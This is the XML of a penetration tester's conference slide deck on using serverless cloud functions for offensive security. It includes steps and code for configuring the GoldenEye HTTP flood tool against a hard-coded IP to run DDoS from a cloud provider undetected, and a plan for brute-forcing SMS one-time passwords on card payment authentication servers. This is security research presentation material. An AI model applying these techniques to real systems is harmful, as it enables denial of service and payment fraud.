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5" r:id="rId19"/>
    <p:sldId id="326" r:id="rId20"/>
    <p:sldId id="327" r:id="rId21"/>
    <p:sldId id="328" r:id="rId22"/>
    <p:sldId id="329" r:id="rId23"/>
    <p:sldId id="33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35" r:id="rId55"/>
    <p:sldId id="309" r:id="rId56"/>
    <p:sldId id="310" r:id="rId57"/>
    <p:sldId id="311" r:id="rId58"/>
    <p:sldId id="331" r:id="rId59"/>
    <p:sldId id="332" r:id="rId60"/>
    <p:sldId id="333" r:id="rId61"/>
    <p:sldId id="334" r:id="rId6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Proxima Nova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F6A935-DA3B-4C0F-821E-E6CF43361F41}">
  <a:tblStyle styleId="{2BF6A935-DA3B-4C0F-821E-E6CF43361F4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503" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="95" d="100"/>
          <a:sy n="95" d="100"/>
        </p:scale>
        <p:origin x="206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3705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doughty.com/uploads/1/4/0/9/14095491/7242725_orig.jp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phy.com/gifs/lightning-WrmDZ1I5kn5ao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animal-eating-panda-13hPPo7Ieb9OW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internet-eoxomXXVL2S0E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krieger-KcJBvtxtZt6k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ZxVox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84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1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62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1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75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2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13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38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84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16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source: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http://serverlesscalc.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69148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5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196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48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3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http://www.ddoughty.com/uploads/1/4/0/9/14095491/7242725_orig.jpg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https://giphy.com/gifs/lightning-WrmDZ1I5kn5ao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91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735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5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774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74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https://giphy.com/gifs/animal-eating-panda-13hPPo7Ieb9OW4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531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72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https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>://media.giphy.com/media/FDaNPcelHJKla/giphy.gif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4997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86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970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980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https://giphy.com/gifs/internet-eoxomXXVL2S0E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14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53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https://usa.visa.com/dam/VCOM/download/merchants/verified-by-visa-acquirer-merchant-implementation-guide.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1816243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https://usa.visa.com/dam/VCOM/download/merchants/verified-by-visa-acquirer-merchant-implementation-guide.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436331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48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04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1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901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85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226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https://giphy.com/gifs/krieger-KcJBvtxtZt6k8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22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975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15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525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825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93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93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8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sources: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https://intl.aliyun.com/forum/read-499</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24661723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1922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724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06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972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84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59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1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6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670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55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sources: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https://aws.amazon.com/lambda/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16143338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8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https://www.artstation.com/artwork/ZxVox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29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9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43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lay-with-docker.com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hyperlink" Target="https://github.com/alexellis/faa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lesscalc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turioninfosec.s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in/ryanbaxendale" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ryanbaxendale" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ryancancomput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eidl/GoldenEy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stic/lambdas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tp.appspot.com/?setotp=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anbaxendale/thunderstruck-demo/tree/master/sms.ot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binaryaler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llis/faa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airbnb/streamalert" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/therefromhere/csp_lamb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avbo/lambda-csp-report-uri" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/goadapp/goad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github.com/0x4D31/honeyLambda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ohnmccuk/cloudflare-ip-security-group-update" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ilijamt/lambda_security_group_manager" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/marekq/aws-lambda-firewa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ws.amazon.com/answers/security/aws-waf-security-automat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510450" y="2476500"/>
            <a:ext cx="8123100" cy="20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Microservices and FaaS for Offensive Security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510450" y="4477712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Ryan Baxendale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World from the Serverless cloud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 descr="aws.lambd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287"/>
            <a:ext cx="9144000" cy="264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2555550" y="3451250"/>
            <a:ext cx="40329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Hello Serverless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World on AWS Lambda (1/4)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350"/>
            <a:ext cx="4156381" cy="15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5" y="3046574"/>
            <a:ext cx="2867025" cy="15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731" y="1233350"/>
            <a:ext cx="3762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3731" y="1865350"/>
            <a:ext cx="2277524" cy="30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AWS Lambda (2/4)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89" y="1219000"/>
            <a:ext cx="3074410" cy="13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49" y="2699700"/>
            <a:ext cx="3413850" cy="21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787" y="1196600"/>
            <a:ext cx="5406512" cy="13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8175" y="3188380"/>
            <a:ext cx="3790950" cy="10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AWS Lambda (3/4)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275"/>
            <a:ext cx="378330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750" y="1154275"/>
            <a:ext cx="3939399" cy="14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528" y="2784775"/>
            <a:ext cx="41338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236" y="4080024"/>
            <a:ext cx="1684425" cy="5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AWS Lambda (4/4)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3150"/>
            <a:ext cx="965075" cy="5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75" y="2019300"/>
            <a:ext cx="42672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725" y="1273150"/>
            <a:ext cx="3133724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816750" y="3595400"/>
            <a:ext cx="3363900" cy="4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IP address is 13.228.72.124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63878" y="3725910"/>
            <a:ext cx="4486805" cy="6499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Hello Serverless World</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr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24" y="0"/>
            <a:ext cx="5820950" cy="36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r="5015"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202425" y="4394175"/>
            <a:ext cx="6739149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on Play with Docker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4" y="2113200"/>
            <a:ext cx="1893300" cy="14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25" y="3559225"/>
            <a:ext cx="3240629" cy="14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274" y="1338424"/>
            <a:ext cx="4466024" cy="13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950" y="2831900"/>
            <a:ext cx="2617613" cy="5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7282" y="2831900"/>
            <a:ext cx="1985017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297750" y="3366025"/>
            <a:ext cx="4173000" cy="5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$ dig +short -x 34.206.199.2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ec2-34-206-199-2.compute-1.amazonaws.com.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382075" y="4022725"/>
            <a:ext cx="3208800" cy="79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+Anonymous (no account)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-time limited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-captcha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11700" y="1073775"/>
            <a:ext cx="4054500" cy="103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Hosted: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http://www.play-with-docker.com/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Build your own: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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https://github.com/alexellis/faas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 serverless framework for Docker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687" y="932837"/>
            <a:ext cx="4682625" cy="327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3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Hello World function to get current IP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http://serverlesscalc.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> 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4588725" y="824225"/>
            <a:ext cx="4243500" cy="174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AWS: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>1M free requests per month and 400,000 GB-seconds of compute time per month</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>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128 MB = 3,200,000 free seconds per month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$0.000000208 per 100ms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300ms - 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>million executions for $1.80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9" y="1916725"/>
            <a:ext cx="3732375" cy="269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599" y="2566449"/>
            <a:ext cx="4652034" cy="2002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$ whoami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Baxendale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Penetration Tester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Centurion Information Security Pte Ltd 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www.centurioninfosec.sg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Singapore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twitter.com/ryancancomputer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github.com/ryanbaxendale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linkedin.com/in/ryanbaxendale</a:t>
            </a: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FaaS support by region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53600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AWS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East (N. Virginia)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East (Ohio)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West (N. California)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West (Oregon)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Canada (Central)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(Ireland)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(Frankfurt)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EU (London)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(Singapore)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(Sydney)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(Seoul)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(Tokyo)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Asia Pacific (Mumbai)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South America (São Paulo)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3465300" y="1152475"/>
            <a:ext cx="1995900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Azure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US 2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US 2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South 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North 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Central US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Canada Central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Canada East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North Europe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West Europe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UK West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UK South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Southeast Asia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East Asia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Japan West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5918399" y="1152475"/>
            <a:ext cx="2783149" cy="374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Azure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17.	Japan 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	Brazil South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19.	Australia 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20.	Australia Southeast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22.	Central India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23.	South India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IBM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US South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Google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IOWA (us-central1)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Play with Docker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(AWS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31395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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="264" name="Shape 264"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="428687" y="1132584"/>
          <a:ext cx="8443000" cy="3281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1300"/>
                <a:gridCol w="1136200"/>
                <a:gridCol w="1515450"/>
                <a:gridCol w="2440200"/>
                <a:gridCol w="2139850"/>
              </a:tblGrid>
              <a:tr h="4043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IBM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Azure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4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Regions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4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Language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(Python)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Docker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6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Swift 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 Node.js 4.3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4.3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Node.js 6.10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2.7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3.6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Bash, Batch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C#, F#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JavaScript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Php, PowerShell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Python, TypeScript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OS (Python)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Debian 8.8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Ubuntu 14.04.1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Linux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4.4.51-40.60.amzn1.x86_64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Windows Server 2012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Network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u="sng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IPv4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2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Advantages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84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Low cost (“free”)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Sign up credit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Unspecified source IP addresses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Possibly low attribution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Global data centers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China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575" y="102534"/>
            <a:ext cx="3734726" cy="1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87" y="3294199"/>
            <a:ext cx="3734724" cy="1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574" y="3659127"/>
            <a:ext cx="3734724" cy="14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574" y="1874075"/>
            <a:ext cx="3734725" cy="1785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7899600" y="1874075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531750" y="3615475"/>
            <a:ext cx="1300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IBM Bluemix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246312" y="3294200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899600" y="102525"/>
            <a:ext cx="9327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9165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510450" y="2989975"/>
            <a:ext cx="8123100" cy="188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Thunderstruck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Finding use cases for FaaS in offensive security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" y="507000"/>
            <a:ext cx="3551800" cy="21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814" y="507000"/>
            <a:ext cx="4347735" cy="2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0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Thunderstruck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use cases for FaaS in offensive security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different cloud service providers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get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>supercomputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> resources without paying supercomputer prices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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4832400" y="1438375"/>
            <a:ext cx="3999900" cy="31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DEF CON 25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DDoS without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Servers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SMS OTP Brute Force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BSidesLV 2017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Searching in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>IPv6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DDoS without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1: DDoS without Servers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999900" cy="35347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purchases anti-ddos service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it work? Will they scrub the attack at 2am?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Plan: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Find a simple HTTP DDoS tool with code in python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 smtClean="0"/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Get it working on a cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>provider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 smtClean="0"/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Start the worker/code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 smtClean="0"/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Monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>the target and wait for results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311600" y="3357800"/>
            <a:ext cx="4457400" cy="1582500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0000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 /$$$$$$            /$$       /$$                     /$$$$$$$$                   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/$$__  $$          | $$      | $$                    | $$_____/                   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| $$  \__/  /$$$$$$ | $$  /$$$$$$$  /$$$$$$  /$$$$$$$ | $$       /$$   /$$  /$$$$$$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| $$ /$$$$ /$$__  $$| $$ /$$__  $$ /$$__  $$| $$__  $$| $$$$$   | $$  | $$ /$$__  $$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| $$|_  $$| $$  \ $$| $$| $$  | $$| $$$$$$$$| $$  \ $$| $$__/   | $$  | $$| $$$$$$$$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| $$  \ $$| $$  | $$| $$| $$  | $$| $$_____/| $$  | $$| $$      | $$  | $$| $$_____/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|  $$$$$$/|  $$$$$$/| $$|  $$$$$$$|  $$$$$$$| $$  | $$| $$$$$$$$|  $$$$$$$|  $$$$$$$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\______/  \______/ |__/ \_______/ \_______/|__/  |__/|________/ \____  $$ \_______/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/$$  | $$         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|  $$$$$$/         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\______/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723925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GoldenEye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https://github.com/jseidl/GoldenEye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slightly to hard code target IP, Host headers, path, and deployed to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>*undisclosed*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> cloud service provider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script to start the function, wait for it to timeout (60 seconds)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Script Kiddie skills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4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Paste goldeneye.py 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def error(msg):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 print help information and exit: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sys.stderr.write(str(msg+"\n"))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usage()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sys.exit(2)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Remove everything from “# Main” / line 567 down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 = GoldenEye("http://128.199.175.83")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goldeneye.useragents = ["Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.104 Safari/537.36"]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goldeneye.nr_workers =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goldeneye.method = METHOD_POST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goldeneye.nr_sockets =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goldeneye.fire()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3901725" y="1152475"/>
            <a:ext cx="4930500" cy="77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on our server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function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logs and wait for results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25" y="2063025"/>
            <a:ext cx="4930575" cy="28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attack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552025" y="939125"/>
            <a:ext cx="3474000" cy="7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is still up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unexpected has occurred...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74" y="2114175"/>
            <a:ext cx="1770360" cy="24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012" y="1995625"/>
            <a:ext cx="51911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00875" y="1183900"/>
            <a:ext cx="2730900" cy="7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Trigger the code to start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Wait for abuse email…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7100" cy="12262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Modify goldeneye to follow redirects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Find in the code (line 336):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       for conn_resp in self.socks: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           resp = conn_resp.getresponse()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Add the following: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body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2686525"/>
            <a:ext cx="8520600" cy="12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if resp.getheader('Location') is not None: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next_url = resp.getheader('Location')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(url, headers) = self.createPayload()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method = random.choice([METHOD_GET, METHOD_POST]) if self.method == METHOD_RAND else self.method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conn_resp.request(method.upper(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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next_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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, None, headers)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349550" y="3791725"/>
            <a:ext cx="1974000" cy="46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Update the function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Try again...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AWS Lambda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Jan 2015 - AWS Lambda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>Preview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dirty="0" smtClean="0"/>
              <a:t>Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>to all AWS Customers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Upload your code and trigger it to run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Scales quickly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1,000,000 code runs for free every month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Only supported node.js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err="1"/>
              <a:t>lambdash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>: AWS Lambda Shell Hack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By Eric Hammond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github.com/alestic/lambdash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 smtClean="0"/>
              <a:t>Run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0"/>
              <a:t>shell commands using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SG" dirty="0" smtClean="0"/>
              <a:t>node.js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67" y="2298750"/>
            <a:ext cx="3026833" cy="227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3" t="4971" r="27535" b="5138"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5805053" y="542140"/>
            <a:ext cx="3027247" cy="17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Monitor the target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r="12827"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2750525" y="1017725"/>
            <a:ext cx="6393475" cy="40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2573100" cy="103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Route 53 Health Checks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Checks HTTP service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look for keywords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9" y="2287839"/>
            <a:ext cx="1722561" cy="1722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Monitor the target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r="4007" b="10703"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2495700" y="1283604"/>
            <a:ext cx="6648300" cy="385989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2573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Route 53 Health Checks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regions/locations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9" y="2287839"/>
            <a:ext cx="1722561" cy="1722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Results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37" y="1039325"/>
            <a:ext cx="8446628" cy="22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1035325" y="3419350"/>
            <a:ext cx="6899400" cy="129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~30 Mbps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Code running in 1 region/zone of 1 cloud service provider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Good bandwidth available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Abuse not detected by the cloud service provider and our account is still active :)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74" y="1611975"/>
            <a:ext cx="3329875" cy="249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Entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>requirements: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Anyone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>who knows how to copy/paste a Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>script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Easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>- script kiddie with free credit to cloud service providers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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>to: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High bandwidth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xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Mbps DDoS infrastructure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SMS OTP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Brute force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2: SMS OTP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311700" y="1059025"/>
            <a:ext cx="3999900" cy="35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credit card purchases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Access Control Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (ACS):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Is this card enrolled in 3-d secure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Is auth available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Authenticate card holder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ACS has to detect brute force of the OTP value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ACS is run by or on behalf of an Issuer (bank)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0" y="1537245"/>
            <a:ext cx="3999700" cy="9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212"/>
            <a:ext cx="3999899" cy="57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150" y="3452574"/>
            <a:ext cx="3613075" cy="142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Shape 330"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4525937" y="410974"/>
            <a:ext cx="4279499" cy="2770800"/>
            <a:chOff x="4499624" y="632249"/>
            <a:chExt cx="4279499" cy="2770800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="331" name="Shape 3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99624" y="632249"/>
              <a:ext cx="4279499" cy="27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Shape 332"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4789350" y="2189175"/>
              <a:ext cx="727200" cy="466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7594975" y="1227225"/>
              <a:ext cx="521700" cy="408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4" name="Shape 334"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583224" y="3105575"/>
            <a:ext cx="4157575" cy="1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https://usa.visa.com/dam/VCOM/download/merchants/verified-by-visa-acquirer-merchant-implementation-guide.pdf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Transaction Flow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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4626525" y="1152475"/>
            <a:ext cx="4205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Secure - Systems and Compliance Testing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Procedures Guide (January 2014)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Product’s tested: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ACS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>MPI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b="1"/>
              <a:t>Visa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Inc.'s letter of compliance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>does not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> under any circumstances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>include any endorsement or warranty regarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> ... of any particular product or service”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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>ACS determines whether the provided password is correct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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“Cardholder fails to correctly enter the authentication information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>within the issuer-defined number of entries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (possible indication of fraudulent user).”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OTP security left to successful implementation of ACS by third party product or hosted service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5" y="1152475"/>
            <a:ext cx="4205774" cy="34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60800" y="4602500"/>
            <a:ext cx="4164900" cy="1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"/>
              <a:t>https://usa.visa.com/dam/VCOM/download/merchants/verified-by-visa-acquirer-merchant-implementation-guide.pdf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Plan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guess 6 digit SMS OTP value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10^6 = 1,000,000 possible values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limited window of 100 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Plan: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Start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>a simulated online </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>purchase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Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>SMS OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>page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Capture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>HTTP request with SMS OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>value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Load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>request into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>thunderstruck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/>
              <a:t>Get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>correct value and continue session in browser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Complete all the steps within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" dirty="0"/>
              <a:t>100 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Good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>use case for FaaS?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00" y="1704712"/>
            <a:ext cx="3645300" cy="2023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Architecture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86" y="1227869"/>
            <a:ext cx="851325" cy="8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l="28282" r="28618"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1711305" y="3639619"/>
            <a:ext cx="733842" cy="8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5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="16532" t="5975" r="17312" b="13386"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6913125" y="2037200"/>
            <a:ext cx="1186150" cy="96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Shape 358"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4183025" y="1080600"/>
            <a:ext cx="2730224" cy="1438500"/>
            <a:chOff x="4183025" y="1080600"/>
            <a:chExt cx="2730224" cy="1438500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="359" name="Shape 359"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="360" idx="3"/>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4852549" y="1415362"/>
              <a:ext cx="2060700" cy="11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1" name="Shape 361"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5000625" y="1420500"/>
              <a:ext cx="1912500" cy="109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2" name="Shape 362"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="360" idx="2"/>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4517787" y="1750124"/>
              <a:ext cx="2395200" cy="76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3" name="Shape 363"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4913625" y="1546800"/>
              <a:ext cx="1999500" cy="97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4" name="Shape 364"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="360" idx="0"/>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4517787" y="1080600"/>
              <a:ext cx="2395200" cy="14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5" name="Shape 365"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="360" idx="1"/>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4183025" y="1415362"/>
              <a:ext cx="2730000" cy="11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6" name="Shape 366"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="360" idx="0"/>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4517787" y="1080600"/>
              <a:ext cx="2395200" cy="143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7" name="Shape 367"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4502625" y="1175400"/>
              <a:ext cx="2410500" cy="134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8" name="Shape 368"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4478925" y="1365000"/>
              <a:ext cx="2434200" cy="115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9" name="Shape 369"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="357" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4544325" y="1240800"/>
              <a:ext cx="2368800" cy="12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360" name="Shape 3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83025" y="1080600"/>
              <a:ext cx="669524" cy="6695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0" name="Shape 370"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="3"/>
            <a:endCxn id="360" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2445147" y="1750124"/>
            <a:ext cx="2072640" cy="23151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1" name="Shape 371"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="0"/>
            <a:endCxn id="355" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1356749" y="2079194"/>
            <a:ext cx="721477" cy="1560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2" name="Shape 372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671300" y="4009050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1) Store random OTP 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2) Clear OTP guess counter</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 373"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386518" y="2981750"/>
            <a:ext cx="1468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3) Keep asking for OTP result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5951125" y="1501625"/>
            <a:ext cx="13752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5) Guess OTP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5875200" y="3099994"/>
            <a:ext cx="1451125" cy="1064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6) Check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>OTP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7) Increment guess counter</a:t>
            </a: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7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="13790" t="14574" r="16663" b="11668"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6790962" y="4164275"/>
            <a:ext cx="1430474" cy="6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3756350" y="2569800"/>
            <a:ext cx="17760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Trigger workers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="378" name="Shape 378"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="356" idx="3"/>
            <a:endCxn id="357" idx="1"/>
          </p:cNvCxnSpPr>
